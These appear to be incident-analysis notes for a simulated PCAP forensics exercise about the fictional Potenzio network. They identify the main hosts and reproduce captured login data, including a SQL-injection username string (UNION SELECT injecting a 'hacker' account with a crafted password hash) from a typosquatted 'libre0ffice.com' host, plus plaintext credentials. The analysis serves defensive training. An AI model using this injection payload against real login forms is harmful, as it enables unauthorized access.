<aside> 🎯 The Potenzio company asks you to analyze the attached PCAP and create a written report (2 pages suggested) detailing if some malicious activities occurred and a timeline of the related events.

They also provide a network diagram of their IT infrastructure (note that the Internet is simulated and uses a single public IP class 58.16.0.0/15).

Please organize the report applying the 5W1H method and briefly discuss if immediate remediation is available.

</aside>

IT Infrastructure

Note that the Internet is simulated and uses a single public IP class 58.16.0.0/15).

Untitled

Who - Main Players

The main conversations are:

from 10.0.200.100:44806 to 58.16.100.252:80: from a client to the simulated internet.
from 192.168.100.101 to 10.0.100.100:3306, from www.potenzio.com to the msql server.

58.16.101.101 is associated with the most active user in the simulated internet environment. This user frequently accesses various websites and services, including popular platforms such as Google, Instagram, Twitter, Facebook, eBay, Amazon, and LinkedIn, among others.

The IP addresses 58.16.102.183 (www.dagospia.com) and 203.0.113.1 (mail.potenzio.com), were also active during the captured network traffic; they never sent a packet but always receiving:

58.16.102.183 (www.dagospia.com) has some conversations on port 80 or 443 (is a web server) and the majority of them are in a single conversation.
203.0.113.1 (mail.potenzio.com) only has 1 conversation, where it received 19 packets on port 110: POP Post Office Protocol (e-mail).

58.16.123.111 (**libre0ffice.com)** (Linux) ****has sent the majority of its packets in one single conversation with 192.168.100.101:80; it also accessed the server using a potentially malicious username and password combination:

58.16.123.111 [libre0ffice.com] (Linux)	58.16.123.111 [libre0ffice.com] (Linux)	192.168.100.101 [www.potenzio.com]	MIME/MultiPart	
username: " AND 1=0 UNION ALL SELECT 'hacker',CONCAT('$','2','b','$','1','2','$',UPPER('X'),UPPER('M'),'1','x',UPPER('S'),UPPER('H'),'a','i','g','l','v','c',UPPER('S'),'p',UPPER('V'),UPPER('A'),UPPER('W'),'.','v','u','i','.',UPPER('F'),UPPER('B'),UPPER('P'),UPPER('O'),'1',UPPER('A'),'8','e','5','l','2','4','9','l',UPPER('Q'),UPPER('I'),UPPER('G'),UPPER('Y'),'0','8','7','f','l','3','s',UPPER('N'),'0',UPPER('F'),'i',UPPER('M'),'u') ,'notmymail', 1, 1; #	
password: pippo	
Unknown	2023-05-15 09:39:33 UTC

There is also another IP from Linux 58.16.119.32, who has logged in with the username green.

58.16.119.32 (Linux)	58.16.119.32 (Linux)	192.168.100.101 [www.potenzio.com]	MIME/MultiPart	
username: green	
password: green_password	
Unknown	2023-05-15 09:38:15 UTC